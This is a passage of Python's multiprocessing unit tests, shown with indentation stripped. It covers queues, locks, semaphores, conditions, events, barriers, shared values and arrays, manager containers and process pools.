if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason, code in (([1, 2, 3], 1), ('ignore this', 1)):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, code)
with open(testfn, 'r') as f:
self.assertEqual(f.read().rstrip(), str(reason))
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 30 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.170)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
for i in range(10):
try:
if get_value(woken) == 6:
break
except NotImplementedError:
break
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=10))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(10))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 10)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
f(*args)
b.wait_for_finished()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
